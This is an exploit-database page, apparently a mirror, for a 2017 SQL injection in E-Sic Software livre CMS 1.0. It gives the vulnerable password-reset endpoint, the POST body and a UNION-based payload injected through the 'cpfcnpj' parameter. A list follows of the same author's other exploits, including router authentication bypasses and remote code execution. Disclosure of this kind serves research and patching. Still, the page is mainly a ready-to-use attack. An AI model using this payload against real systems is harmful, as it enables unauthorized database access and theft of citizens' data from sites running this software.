Search for hundreds of thousands of exploits

"E-Sic Software livre CMS - 'cpfcnpj' SQL Injection"

Author

Exploit author

"Elber Tavares"

Platform

Exploit platform

php

Release date

Exploit published date

2017-10-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

vulnerability is in the password reset parameter of the software,
where we can send sql parameters and interact directly with the
database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
---------------------------------------------------------------------

Url: http://vulnerablesite/esic/reset/

POST: cpfcnpj=test&btsub=Enviar

Parameter: cpfcnpj (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
    ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
GJkR&btsub=Enviar
Release DateTitleTypePlatformAuthor
2020-03-02"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)"webappshardware"Elber Tavares"
2020-03-02"TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)"webappshardware"Elber Tavares"
2020-03-02"TP LINK TL-WR849N - Remote Code Execution"webappshardware"Elber Tavares"
2017-10-12"E-Sic Software livre CMS - Cross Site Scripting"webappsphp"Elber Tavares"
2017-10-12"E-Sic Software livre CMS - 'f' SQL Injection"webappsphp"Elber Tavares"
2017-10-12"E-Sic Software livre CMS - Autentication Bypass"webappsphp"Elber Tavares"
2017-10-12"E-Sic Software livre CMS - 'cpfcnpj' SQL Injection"webappsphp"Elber Tavares"
2017-09-28"Roteador Wireless Intelbras WRN150 - Autentication Bypass"webappshardware"Elber Tavares"
2017-09-07"Roteador Wireless Intelbras WRN150 - Cross-Site Scripting"webappshardware"Elber Tavares"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/42981/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.